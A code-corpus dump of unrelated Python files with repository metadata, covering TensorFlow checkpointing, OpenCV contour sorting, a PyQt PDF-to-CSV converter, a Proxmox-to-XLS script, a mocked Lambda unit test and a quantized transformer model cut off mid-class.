'model.ckpt-{}'.format(latest_step))
latest_graph = os.path.join(self.folder,
'model.ckpt-{}.meta'.format(latest_step))
return (latest_ckpt, latest_graph, latest_step)
def get_ckpt_info(self):
"""Get info of the latest checkpoint."""
if not os.path.exists(self.folder):
raise Exception('Folder "{}" does not exist'.format(self.folder))
model_id = os.path.basename(self.folder.rstrip('/'))
self.log.info('Restoring from {}'.format(self.folder))
model_opt_fname = os.path.join(self.folder, kModelOptFilename)
data_opt_fname = os.path.join(self.folder, kDatasetOptFilename)
if os.path.exists(model_opt_fname):
with open(model_opt_fname) as f_opt:
model_opt = yaml.load(f_opt)
else:
model_opt = None
self.log.info('Model options: {}'.format(model_opt))
if os.path.exists(data_opt_fname):
with open(data_opt_fname) as f_opt:
data_opt = yaml.load(f_opt)
else:
data_opt = None
ckpt_fname, graph_fname, latest_step = self.get_latest_ckpt()
self.log.info('Restoring at step {}'.format(latest_step))
return {
'ckpt_fname': ckpt_fname,
'graph_fname': graph_fname,
'model_opt': model_opt,
'data_opt': data_opt,
'step': latest_step,
'model_id': model_id
}
def restore(self, sess, ckpt_fname=None):
"""Restore the checkpoint file."""
if ckpt_fname is None:
ckpt_fname = self.get_latest_ckpt()[0]
if self.tf_saver is None:
self.tf_saver = tf.train.Saver(tf.all_variables())
self.tf_saver.restore(sess, ckpt_fname)
pass
| [
"renmengye@gmail.com"
] | renmengye@gmail.com |
280fa588eaa9caf6d19665bf34d170cb7b0fcf06 | e1def0cb3ea2f1b9e7e8c9183ef3eae6eb4f2d97 | /Moudel1/Outline_Sort.py | 8278d28cec2edb53b08d42112b0c289f74a5682e | [] | no_license | w-x-me/PyImageSearch | 58084fd4834457a10a75383702093f5d98a0e6e4 | fc6034ae43767f9ec5cc0d4e6bb771d70a866a56 | refs/heads/master | 2020-03-20T07:50:17.690517 | 2018-06-14T02:08:51 | 2018-06-14T02:08:51 | 134,201,710 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,691 | py | import numpy as np
import argparse
import cv2
def sort_contours(cnts, method = "left-to-right"):
reverse = False
i = 0
if method == "right-to-left" or method == "bottom-to-top":
reverse = True
if method == "top-to-left" or method == "bottom-to-top":
i = 1
boundingBoxes = [cv2.boundingRect(c) for c in cnts]
(cnts, boundingBoxes) = zip(*sorted(zip(cnts, boundingBoxes),key=lambda b:b[1][i], reverse=reverse))
return (cnts, boundingBoxes)
def draw_contour(image, c, i):
M = cv2.moments(c)
cX = int(M["m10"] / M["m00"])
cY = int(M["m01"] / M["m00"])
cv2.putText(image, "#{}".format(i + 1), (cX - 20, cY), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (255, 255, 255), 2)
return image
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required = True, help = "Path to input image")
ap.add_argument("-m", "--method", required = True, help = "Sorting method")
args = vars(ap.parse_args())
image = cv2.imread(args["image"])
accumEdged = np.zeros(image.shape[:2], dtype = "uint8")
for chan in cv2.split(image):
chan = cv2.medianBlur(chan, 11)
edged = cv2.Canny(chan, 50, 200)
accumEdged = cv2.bitwise_or(accumEdged, edged)
cv2.imshow("Edge Map", accumEdged)
(cnts, _) = cv2.findContours(accumEdged.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:5]
orig = image.copy()
for (i, c) in enumerate(cnts):
orig = draw_contour(orig, c, i)
cv2.imshow("Unsorted", orig)
(cnts,boundingBoxes) = sort_contours(cnts, method = args["method"])
for (i, c) in enumerate(cnts):
draw_contour(image, c, i)
cv2.imshow("Sorted", image)
cv2.waitKey(0)
| [
"w-x-me@985808898@qq.com"
] | w-x-me@985808898@qq.com |
8f6ccdd1171460bb521a2f360412fd8e4a308765 | 3076fc0c3ceb285cc2db6f0d19f045c274adcceb | /[Bali]_Coco_Supermarket/app.py | 4b9184d7a9eb917f248e27135f8deca028d1f937 | [] | no_license | evosys/CSVConverter | 121b0c23e18cf59b939352b751be5e8ce12b4999 | 6026870975001f34608fc1303ed922d0f8e474ef | refs/heads/master | 2020-03-17T12:40:14.406236 | 2019-02-15T08:41:51 | 2019-02-15T08:41:51 | 133,597,807 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,544 | py | # -*- coding: utf-8 -*-
# @Author: ichadhr
# @Date: 2018-10-02 17:28:58
# @Last Modified by: richard.hari@live.com
# @Last Modified time: 2018-10-08 14:15:15
import sys
import time
import os
import appinfo
import itertools
import subprocess
import re
from PyQt5 import QtCore, QtWidgets
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from gui import Ui_MainWindow
from pathlib import Path
import distutils.dir_util
import distutils.spawn
# import warnings
# variabel for header CSV
HEAD_CODE_STORE = 'code_store'
HEAD_PO_NO = 'po_no'
HEAD_BARCODE = 'barcode'
HEAD_QTY = 'qty'
HEAD_MODAL = 'modal_karton'
NEWDIR = 'CSV-output'
DELIM = ';'
# CODE_STORE = '047361'
IS_WIN32 = 'win32' in str(sys.platform).lower()
def resource_path(relative_path):
""" Get absolute path to resource, works for dev and for PyInstaller """
if hasattr(sys, '_MEIPASS'):
return os.path.join(sys._MEIPASS, relative_path)
return os.path.join(os.path.abspath("."), relative_path)
# warnings.filterwarnings("ignore", message="RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibity. Expected 56, got 52")
# main class
class mainWindow(QMainWindow, Ui_MainWindow) :
def __init__(self) :
QMainWindow.__init__(self)
self.setupUi(self)
# app icon
self.setWindowIcon(QIcon(':/resources/icon.png'))
# centering app
tr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
tr.moveCenter(cp)
self.move(tr.topLeft())
# path tabula
self.jarfile = resource_path("tabula/bin/tabula-1.0.2-jar-with-dependencies.jar")
# button Open
self.btOpen.clicked.connect(self.openPDF)
# button convert
self.btCnv.clicked.connect(self.BtnCnv)
# add item to combobox
self.cbOutlet.addItem('COCO MART DC', '058616')
self.cbOutlet.addItem('COCO MART MUMBUL', '058605')
self.cbOutlet.addItem('COCO MART JIMBARAN', '050018')
self.cbOutlet.addItem('COCO MART BATUBULAN 13206/43006', '047375')
self.cbOutlet.addItem('COCO SUPERMARKET UBUD 13208/43008', '047361')
# status bar
self.statusBar().showMessage('v'+appinfo._version)
# hide label path
self.lbPath.hide()
self.lbPath.clear()
# PATH FILE
def openPDF(self) :
fileName, _ = QFileDialog.getOpenFileName(self,"Open File", "","PDF Files (*.pdf)")
if fileName:
self.lbPath.setText(fileName)
x = QUrl.fromLocalFile(fileName).fileName()
self.edFile.setText(x)
self.edFile.setStyleSheet("""QLineEdit { color: green }""")
# Create Directory
def CreateDir(self, cDIR, nDir, filename) :
resPathFile = os.path.abspath(os.path.join(cDIR, nDir, "{}.csv".format(filename)))
if os.path.exists(resPathFile) :
os.remove(resPathFile)
else :
# os.makedirs(os.path.dirname(resPathFile), exist_ok=True)
distutils.dir_util.mkpath(os.path.dirname(resPathFile))
return resPathFile
# open file
def open_file(self, filename):
if sys.platform == "win32":
os.startfile(filename)
else:
opener ="open" if sys.platform == "darwin" else "xdg-open"
subprocess.call([opener, filename])
# running tabula
def tabula(self, jarfile, coordinate, pathFile) :
output = self.launchWithoutConsole('java', ['-jar', str(jarfile), '-p', 'all', '-a', str(coordinate), str(pathFile)])
return output
def launchWithoutConsole(self, command, args):
"""Launches 'command' windowless and waits until finished"""
startupinfo = subprocess.STARTUPINFO()
stdin = subprocess.PIPE
stdout = subprocess.PIPE
stderr = subprocess.PIPE
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
tmpRes, err = subprocess.Popen([command] + args, startupinfo=startupinfo, stdin=stdin, stderr=stderr, stdout=stdout).communicate()
result = tmpRes.decode('utf-8').splitlines()
return result
def PDFponum(self, pathPDF) :
crdnt = "126.066,78.466,135.734,172.178"
result = self.tabula(self.jarfile, crdnt, pathPDF)
return result
def PDFbarcode(self, pathPDF) :
crdnt = "180.359,30.866,840.809,107.472"
tmpResult = self.tabula(self.jarfile, crdnt, pathPDF)
result = self.checkListFloat(tmpResult, True)
return result
def PDFqty(self, pathPDF) :
crdnt = "180.359,382.659,839.322,426.541"
tmpResult = self.tabula(self.jarfile, crdnt, pathPDF)
result = self.checkListFloat(tmpResult, True)
return result
def PDFmodal(self, pathPDF) :
crdnt = "179.616,309.028,838.578,382.6598"
tmpResult = self.tabula(self.jarfile, crdnt, pathPDF)
result = self.checkListFloat(tmpResult)
return result
# check a list for float type value
def checkListFloat(self, arList, isfloat = False) :
result = []
if isfloat :
for _i in arList:
if self.checkFLoat(_i) :
result.append([int(float(_i))])
else :
for _i in arList:
res = re.sub('[^\d\.,]', '', _i)
if res :
result.append([res])
return result
# check float
def checkFLoat(self, value) :
try :
return float(value).is_integer()
except ValueError:
return False
# button convert CSV
def BtnCnv(self) :
checkJava = distutils.spawn.find_executable("java")
if checkJava is not None :
current_dir = os.getcwd()
# PATH file
pathPDF = self.lbPath.text()
resPath, resFilename = os.path.split(os.path.splitext(pathPDF)[0])
resPathFile = self.CreateDir(current_dir, NEWDIR, resFilename)
resultPath = Path(os.path.abspath(os.path.join(current_dir, NEWDIR)))
CODE_STORE = str(self.cbOutlet.itemData(self.cbOutlet.currentIndex()))
tmpponum = self.PDFponum(pathPDF)
ponum = tmpponum[0]
brc = self.PDFbarcode(pathPDF)
qty = self.PDFqty(pathPDF)
mdl = self.PDFmodal(pathPDF)
# prepare write CSV
with open(resPathFile, "w+") as csv :
# write first header
csv.write(HEAD_CODE_STORE + DELIM + HEAD_PO_NO + DELIM + HEAD_BARCODE + DELIM + HEAD_QTY + DELIM + HEAD_MODAL)
# write new line
csv.write("\n")
for br, qt, md in zip(brc, qty, mdl) :
for resCD, resPO, resBC, resQT, resMD in zip(itertools.repeat(CODE_STORE, len(br)), itertools.repeat(ponum, len(br)), br, qt, md) :
resBC = str(resBC)
resQT = str(resQT)
resMD = str(resMD)
csv.write(resCD+DELIM+resPO+DELIM+resBC+DELIM+resQT+DELIM+resMD+'\n')
csv.close()
reply = QMessageBox.information(self, "Information", "Success!", QMessageBox.Ok)
if reply == QMessageBox.Ok :
self.open_file(str(resultPath))
else :
msg = "``java` command is not found in this system. Please ensure Java is installed and PATH is set for `java`"
QMessageBox.critical(self, "Error", msg, QMessageBox.Ok)
if __name__ == '__main__' :
app = QApplication(sys.argv)
# create splash screen
splash_pix = QPixmap(':/resources/unilever_splash.png')
splash = QSplashScreen(splash_pix, Qt.WindowStaysOnTopHint)
splash.setWindowFlags(QtCore.Qt.FramelessWindowHint)
splash.setEnabled(False)
# adding progress bar
progressBar = QProgressBar(splash)
progressBar.setMaximum(10)
progressBar.setGeometry(17, splash_pix.height() - 20, splash_pix.width(), 50)
splash.show()
for iSplash in range(1, 11) :
progressBar.setValue(iSplash)
t = time.time()
while time.time() < t + 0.1 :
app.processEvents()
time.sleep(1)
window = mainWindow()
window.setWindowTitle(appinfo._appname)
# window.setWindowFlags(QtCore.Qt.WindowCloseButtonHint)
# window.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)
window.show()
splash.finish(window)
sys.exit(app.exec_())
| [
"ichadhr@gmail.com"
] | ichadhr@gmail.com |
1ae2756ffd67ded6954b7e80528cc6c0ec45d4bb | b21182c969a102de41ca785be7e2e2e270977786 | /pyproxmox_to_xls.py | b37bde734045fbcf29799b45f1651c864f4148cf | [] | no_license | Mythological/Proxmox_node_ip_to_xls | a9357b17810dc0fe5ae716019af3ce744f071d2b | 08788f00bce114530be198d076483e028cf3332b | refs/heads/master | 2020-06-28T19:33:13.986717 | 2016-11-23T06:22:04 | 2016-11-23T06:22:04 | 74,480,790 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 782 | py |
from pyproxmox import *
import xlwt
import getpass
import os
ip_addr = raw_input("Proxmox's host or IP:")
login = raw_input("login:")
realm = raw_input("Realm[pam]:") or "pam"
passw = getpass.getpass("Password:")
a = prox_auth(ip_addr,login + '@' + realm ,passw)
b = pyproxmox(a)
a2 = b.getClusterStatus()
a3 = a2[u'data']
#for i in a3:
# print i.get(u'name')
# print i.get(u'ip')
workbook = xlwt.Workbook()
sheet = workbook.add_sheet("Sheet1", cell_overwrite_ok=True)
count = 0
count2 = 0
for i in a3:
sheet.write(count, 0, i.get(u'name'))
sheet.write(count2, 1, i.get(u'ip'))
count += 1
count2 += 1
workbook.save("Nodes_ip_proxmox.xls")
print "File created at:" +" "+ os.path.abspath("Nodes_ip_proxmox.xls")
| [
"noreply@github.com"
] | Mythological.noreply@github.com |
105eb9656b3a6ada066aa37a090ac4ccdfde566b | c19b84dba08bc8616348cc4f3daee10f1bb128a5 | /src/tests/unit/test_get_chars_for_list_id.py | 8ebcb0278ba9795d791000e7e554c169033892ba | [] | no_license | em-shea/vocab | 4bb0e5272444ce71852febb6984b2be9466959ca | 0f53213b8d889845775d14c3bed4ac7938a7011f | refs/heads/master | 2023-07-20T00:27:57.661107 | 2022-09-10T17:23:45 | 2022-09-10T17:23:45 | 161,578,317 | 72 | 24 | null | 2022-05-25T05:45:50 | 2018-12-13T03:23:14 | Python | UTF-8 | Python | false | false | 7,520 | py | import sys
import json
sys.path.append('../../')
sys.path.append('../../layer/python')
import unittest
from unittest import mock
with mock.patch.dict('os.environ', {'AWS_REGION': 'us-east-1', 'TABLE_NAME': 'mock-table'}):
from get_chars_for_list_id.app import lambda_handler
def mocked_query_dynamodb(list_id, limit=None, last_word_token=None, audio_file_key_check=False):
return {
"Items":
[
{
"SK":"WORD#12345",
"PK":"LIST#1ebcad41-197a-123123",
"Word":{
"Simplified": "你好",
"Definition": "word definition",
"Pinyin": "word pinyin",
"Audio file key": ""
}
},
{
"SK":"WORD#23456",
"PK":"LIST#1ebcad41-197a-123123",
"Word":{
"Simplified": "我",
"Definition": "word definition",
"Pinyin": "word pinyin",
"Audio file key": ""
}
},
{
"SK":"WORD#34567",
"PK":"LIST#1ebcad41-197a-123123",
"Word":{
"Simplified": "你",
"Definition": "word definition",
"Pinyin": "word pinyin",
"Audio file key": ""
}
}
]
}
class GetCharsForListIdTest(unittest.TestCase):
@mock.patch('list_word_service.query_dynamodb', side_effect=mocked_query_dynamodb)
def test_build(self, query_dynamodb_mock):
response = lambda_handler(self.apig_event(), "")
self.assertEqual(query_dynamodb_mock.call_count, 1)
def apig_event(self):
return {
"list_id": "12345",
"last_word_token": "",
"resource": "/generate_audio",
"path": "/generate_audio",
"httpMethod": "GET",
"headers": {
"Accept": "application/json, text/plain, */*",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh-HK;q=0.7,zh-MO;q=0.6,zh;q=0.5",
"Authorization": "123123123",
"CloudFront-Forwarded-Proto": "https",
"CloudFront-Is-Desktop-Viewer": "true",
"CloudFront-Is-Mobile-Viewer": "false",
"CloudFront-Is-SmartTV-Viewer": "false",
"CloudFront-Is-Tablet-Viewer": "false",
"CloudFront-Viewer-Country": "GB",
"Host": "api.haohaotiantian.com",
"origin": "http://localhost:8080",
"Referer": "http://localhost:8080/",
"sec-ch-ua": "\" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"91\", \"Chromium\";v=\"91\"",
"sec-ch-ua-mobile": "?0",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "cross-site",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36",
"Via": "2.0 123.cloudfront.net (CloudFront)",
"X-Amz-Cf-Id": "Iz123BjvWaSJQw==",
"X-Amzn-Trace-Id": "Roo12312348867cca34e3",
"X-Forwarded-For": "81.123",
"X-Forwarded-Port": "443",
"X-Forwarded-Proto": "https"
},
"multiValueHeaders": {
"Accept": [
"application/json, text/plain, */*"
],
"Accept-Encoding": [
"gzip, deflate, br"
],
"Accept-Language": [
"en-US,en;q=0.9,zh-CN;q=0.8,zh-HK;q=0.7,zh-MO;q=0.6,zh;q=0.5"
],
"Authorization": [
"123123123"
],
"CloudFront-Forwarded-Proto": [
"https"
],
"CloudFront-Is-Desktop-Viewer": [
"true"
],
"CloudFront-Is-Mobile-Viewer": [
"false"
],
"CloudFront-Is-SmartTV-Viewer": [
"false"
],
"CloudFront-Is-Tablet-Viewer": [
"false"
],
"CloudFront-Viewer-Country": [
"GB"
],
"Host": [
"api.haohaotiantian.com"
],
"origin": [
"http://localhost:8080"
],
"Referer": [
"http://localhost:8080/"
],
"sec-ch-ua": [
"\" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"91\", \"Chromium\";v=\"91\""
],
"sec-ch-ua-mobile": [
"?0"
],
"sec-fetch-dest": [
"empty"
],
"sec-fetch-mode": [
"cors"
],
"sec-fetch-site": [
"cross-site"
],
"User-Agent": [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36"
],
"Via": [
"2.0 123.cloudfront.net (CloudFront)"
],
"X-Amz-Cf-Id": [
"IzAVY123WaSJQw=="
],
"X-Amzn-Trace-Id": [
"Root=1-12367cca34e3"
],
"X-Forwarded-For": [
"123"
],
"X-Forwarded-Port": [
"443"
],
"X-Forwarded-Proto": [
"https"
]
},
"queryStringParameters": "None",
"multiValueQueryStringParameters": "None",
"pathParameters": "None",
"stageVariables": "None",
"requestContext": {
"resourceId": "vylypt",
"authorizer": {
"claims": {
"sub": "770123132862dba2",
"aud": "mi4ig1231236mgodd",
"email_verified": "true",
"event_id": "cc6a1231239878f86be",
"token_use": "id",
"auth_time": "123",
"iss": "https://cognito-idp.us-east-1.amazonaws.com/us-east-1_123123",
"cognito:username": "770e2123123862dba2",
"exp": "Sat Jul 03 12:33:44 UTC 2021",
"iat": "Sat Jul 03 11:33:44 UTC 2021",
"email": "test@email.com"
}
},
"resourcePath": "/user_data",
"httpMethod": "GET",
"extendedRequestId": "B5JkUG123FeWw=",
"requestTime": "03/Jul/2021:12:20:43 +0000",
"path": "/user_data",
"accountId": "132123",
"protocol": "HTTP/1.1",
"stage": "Prod",
"domainPrefix": "api",
"requestTimeEpoch": 123123,
"requestId": "91d7123123f4a3764",
"identity": {
"cognitoIdentityPoolId": "None",
"accountId": "None",
"cognitoIdentityId": "None",
"caller": "None",
"sourceIp": "81.123",
"principalOrgId": "None",
"accessKey": "None",
"cognitoAuthenticationType": "None",
"cognitoAuthenticationProvider": "None",
"userArn": "None",
"userAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36",
"user": "None"
},
"domainName": "api.haohaotiantian.com",
"apiId": "123"
},
"isBase64Encoded": False
} | [
"c.emilyshea@gmail.com"
] | c.emilyshea@gmail.com |
51ddda72bb91f79aefbb68b25280eba14db6151a | 81ac429e642c1f93f91c2358d975e314a79b3232 | /grillplanner/wsgi.py | d2531a8c1aafb3e2f7c2bf0e80b1eb2f5a311860 | [] | no_license | d70-t/grillplaner | af95297fc0563a067728644af0f1022f2c43f774 | ea32210a908408b6b684085575b46e7809679e7b | refs/heads/master | 2020-03-18T07:35:25.276738 | 2018-06-05T13:02:10 | 2018-06-05T13:02:10 | 134,462,212 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | """
WSGI config for grillplanner project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "grillplanner.settings")
application = get_wsgi_application()
| [
"tobi@die70.de"
] | tobi@die70.de |
ed28d70f2179176fbf72c8f2715244cab656f33f | dbdc5835bd2e7c5dd924f35cdf4f66962ff2d59f | /Section-2/Simple_Linear_Regression/venv/bin/f2py | b7ef5ba9a5c9c6a44aebd69e85ec15b2285606c2 | [] | no_license | nikhilkumar9687/ML_code_in_Python | cdf0aafbb04b93bcefedd1350a5fe346c16ba147 | 692a43913113a6220aa6a909d83324e479757082 | refs/heads/master | 2022-10-06T12:58:36.029058 | 2020-06-08T20:25:19 | 2020-06-08T20:25:19 | 266,406,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 321 | #!/home/nikhil/Desktop/Machine+Learning+A-Z+(Codes+and+Datasets)/My_Code/Section-2/Simple_Linear_Regression/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from numpy.f2py.f2py2e import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"kumar.nikhil9687@gmail.com"
] | kumar.nikhil9687@gmail.com | |
aa00df2b260e6c6ab031c83ba1170fc89fa50eee | f6814281de06f6d6eff1cc9b40f9596274455ece | /segmentation/local_maxima.py | 7ba208efda2582ce2001beca2c44eabccf246bdb | [
"MIT"
] | permissive | file-campuran/scikit-image-clustering-scripts | 806ad366202f3054bf0f602e414c083428372177 | 2197f23b904463b358421bc8a8bd85a3cb4cc2f1 | refs/heads/master | 2022-10-07T23:17:18.814705 | 2020-06-02T18:00:37 | 2020-06-02T18:00:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,000 | py | #!/usr/bin/env python
# http://stackoverflow.com/questions/9111711/get-coordinates-of-local-maxima-in-2d-array-above-certain-value
import numpy as np
from osgeo import gdal
import scipy.ndimage as ndimage
import scipy.ndimage.filters as filters
# initialize driver
driver = gdal.GetDriverByName('GTiff')
def write_image(img, filename):
"""
Write img array to a file with the given filename
Args:
img (Band)
filename (str)
"""
x_size = img.shape[1]
y_size = img.shape[0]
dataset = driver.Create(filename, x_size, y_size)
dataset.GetRasterBand(1).WriteArray(img)
# load original image
dataset = gdal.Open('img/mozambique-after-subset.tif')
band = dataset.GetRasterBand(1)
img = band.ReadAsArray().astype(np.uint8)
# position of local maxima
data_max = filters.maximum_filter(img, 5)
maxima = (img == data_max)
data_min = filters.minimum_filter(img, 5)
diff = ((data_max - data_min) > 150)
maxima[diff == 0] = 0
write_image(maxima, 'img/maxima.tif')
| [
"h.benoudjit@gmail.com"
] | h.benoudjit@gmail.com |
8d46d4d91c2a121fd214c9ccf2d35f826893683b | 750932da205e48eb860f72fa35579e2f7c78b69c | /django-silk-example/manage.py | 8201ceddde55f39f2b499d0d80c3635e4f50de0d | [
"MIT"
] | permissive | 510908220/django-performance-optimization | 8251682c41be4695947c07d958fa96f2e6b162af | 53f62dc8741b1c72f1f97155a1e2c05c1483bd92 | refs/heads/master | 2022-12-13T14:48:40.864496 | 2018-04-28T02:04:20 | 2018-04-28T02:05:28 | 130,834,744 | 1 | 0 | MIT | 2022-12-08T02:04:24 | 2018-04-24T10:07:39 | Python | UTF-8 | Python | false | false | 544 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "silk_example.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"510908220@qq.com"
] | 510908220@qq.com |
5bf8de204ab7c6510a81ed63729019d2bf497ec1 | 61db901b72461684eb4d78d278e07ac49e98cba2 | /precourse_wk3d1/yes_no.py | 4ddeb9592cee7102e5269da64f2cdfc8fe3da546 | [] | no_license | calebkress/practice-python-scripts | 0b5e9cf27801ad5759e6f3283e6326f405d812f8 | 9fac1a6e7be245ea44486e3adc6f14df3e9a7e5d | refs/heads/master | 2020-04-05T02:27:34.285550 | 2019-03-27T18:27:07 | 2019-03-27T18:27:07 | 156,477,585 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 420 | py | # Takes a list of numbers and an integer, and returns an array saying whether each number in the list is divisible by the second number.
def yes_no(num_str = raw_input('Enter a list of comma-separated numbers: '), num = input('Enter a number to divide by: ')):
num_list = num_str.split(', ')
print(num_list)
result = ['yes' if int(i) % num == 0 else 'no' for i in num_list]
return result
print(yes_no())
| [
"calebkress@gmail.com"
] | calebkress@gmail.com |
26e9eb2c9fc487507d5a6f6860bffd2bec7a7407 | 6772366c837db17c2a948aad91d53227d566fea0 | /src/qt.py | 92edf341ac72103120e0fe5d6106d9244302fa81 | [
"MIT"
] | permissive | stangelid/qt | c0ede36e48cedda22f9f8e627ad9d3ef20eb895b | c136ac00e03adf443b90cd65ba0523a3617be01f | refs/heads/main | 2023-06-19T00:23:53.618522 | 2021-07-14T09:47:21 | 2021-07-14T09:47:21 | 318,196,432 | 37 | 8 | null | null | null | null | UTF-8 | Python | false | false | 8,284 | py | import torch
import torch.nn as nn
from utils.data import *
from encoders import *
from quantizers import *
class QuantizedTransformerModel(nn.Module):
def __init__(self,
vocab_size: int,
d_model: int = 320,
codebook_size: int = 1024,
commitment_cost: float = 1.00,
ema_decay: float = 0.99,
temp: float = 1.0,
num_samples: int = 10,
epsilon: float = 1e-5,
nlayers: int = 3,
internal_nheads: int = 4,
output_nheads: int = 8,
d_ff: int = 512,
dropout: float = 0.1,
use_in_pos: bool = False,
use_out_pos: bool = False,
padding_idx: int = 0,
unk_idx: int = 1,
bos_idx: int = 2,
eos_idx: int = 3):
super(QuantizedTransformerModel, self).__init__()
self.vocab_size = vocab_size
self.d_model = d_model
self.codebook_size = codebook_size
self.use_in_pos = use_in_pos
self.use_out_pos = use_out_pos
self.padding_idx = padding_idx
self.unk_idx = unk_idx
self.bos_idx = bos_idx
self.eos_idx = eos_idx
self.in_emb = nn.Embedding(vocab_size, d_model, padding_idx=padding_idx)
self.out_emb = self.in_emb
if use_in_pos:
self.in_pos = PositionalDocumentEncoding(d_model, dropout)
if use_out_pos:
self.out_pos = self.in_pos
elif use_out_pos:
self.out_pos = PositionalDocumentEncoding(d_model, dropout)
self.encoder = TransformerDocumentQuantizerSoftEMA(
codebook_size=codebook_size,
d_model=d_model,
temp=temp,
num_samples=num_samples,
commitment_cost=commitment_cost,
ema_decay=ema_decay,
epsilon=epsilon,
nlayers=nlayers,
internal_nheads=internal_nheads,
output_nheads=output_nheads,
d_ff=d_ff,
dropout=dropout)
decoder_layer = nn.TransformerDecoderLayer(
d_model,
internal_nheads,
dim_feedforward=d_ff,
dropout=dropout)
self.decoder = nn.TransformerDecoder(
decoder_layer,
nlayers,
norm=nn.LayerNorm(d_model))
self.linear = nn.Linear(self.d_model,
self.vocab_size)
def in_embed(self, src):
emb = self.in_emb(src)
if self.use_in_pos:
emb = self.in_pos(emb)
return emb
def out_embed(self, tgt):
emb = self.out_emb(tgt)
if self.use_out_pos:
emb = self.out_pos(emb)
return emb
def encode(self, src, quantize=True, residual_coeff=0.0):
assert src.dim() == 3, 'Input (source) must be 3-dimensional [B x S x T]'
batch_size, nsent, ntokens = src.size()
device = src.device
sent_tokens = torch.ones(batch_size, nsent, 1).long() * self.unk_idx
sent_tokens = sent_tokens.to(device)
src = torch.cat([sent_tokens, src], dim=2)
if self.padding_idx is not None:
padding_mask = self.get_padding_mask(src)
src_emb = self.in_embed(src)
quantized_memory, encodings, q_loss, perplexity = \
self.encoder(src_emb, padding_mask=padding_mask, \
quantize=quantize, residual_coeff=residual_coeff)
return quantized_memory, encodings, q_loss, perplexity
def decode(self, tgt, memory, memory_mask=None,
memory_key_padding_mask=None):
assert tgt.dim() == 3, 'Input (target) must be 3-dimensional [B x S x T]'
assert memory.dim() == 4, 'Input (memory) must be 4-dimensional [B x S x MT x E]'
device = tgt.device
batch_size, nsent, ntokens = tgt.size()
mem_batch_size, mem_nsent, mem_ntokens, mem_emb_size = memory.size()
assert batch_size == mem_batch_size \
and nsent == mem_nsent \
and mem_emb_size == self.d_model, \
'Target, memory and model dimensionalities don\'t match'
tgt_emb = self.out_embed(tgt).reshape(batch_size * nsent, ntokens, -1).transpose(0, 1)
tgt = tgt.reshape(batch_size * nsent, ntokens)
tgt_mask = generate_square_subsequent_mask(ntokens).to(device)
if self.padding_idx is not None:
tgt_key_padding_mask = self.get_padding_mask(tgt)
memory = memory.reshape(mem_batch_size * mem_nsent, mem_ntokens, mem_emb_size).transpose(0, 1)
if memory_key_padding_mask is not None:
memory_key_padding_mask = \
memory_key_padding_mask.reshape(mem_batch_size * mem_nsent, mem_ntokens)
output = self.decoder(
tgt_emb,
memory,
tgt_mask=tgt_mask,
memory_mask=memory_mask,
tgt_key_padding_mask=tgt_key_padding_mask,
memory_key_padding_mask=memory_key_padding_mask)
return output.transpose(0, 1).reshape(batch_size, nsent, ntokens, -1)
def forward(self, src, tgt, quantize=True, residual_coeff=0.0):
src_batch_size, src_nsent, src_ntokens = src.size()
tgt_batch_size, tgt_nsent, tgt_ntokens = tgt.size()
assert src_batch_size == tgt_batch_size and src_nsent == tgt_nsent, \
'Size mismath between source and target'
memory, encodings, q_loss, perplexity = \
self.encode(src, quantize=quantize, residual_coeff=residual_coeff)
out = self.decode(tgt, memory)
return self.linear(out), encodings, q_loss, perplexity
def generate(self, src, maxlen=40, quantize=True, residual_coeff=0.0):
assert src.dim() == 3, 'Input (source) must be 3-dimensional'
batch_size, nsent, ntokens = src.size()
device = src.device
memory, encodings, q_loss, perplexity = \
self.encode(src, quantize=quantize, residual_coeff=residual_coeff)
# <BOS> tgt seq for generation
tgt = torch.LongTensor(batch_size, nsent, maxlen).fill_(self.padding_idx).to(device)
tgt[:,:,0] = self.bos_idx
for i in range(1, maxlen):
out = self.decode(tgt[:,:,:i], memory)
prob = self.linear(out)
decode_output = prob.argmax(dim=-1)
tgt[:,:,i] = decode_output[:,:,-1]
return tgt, encodings
def cluster(self, src):
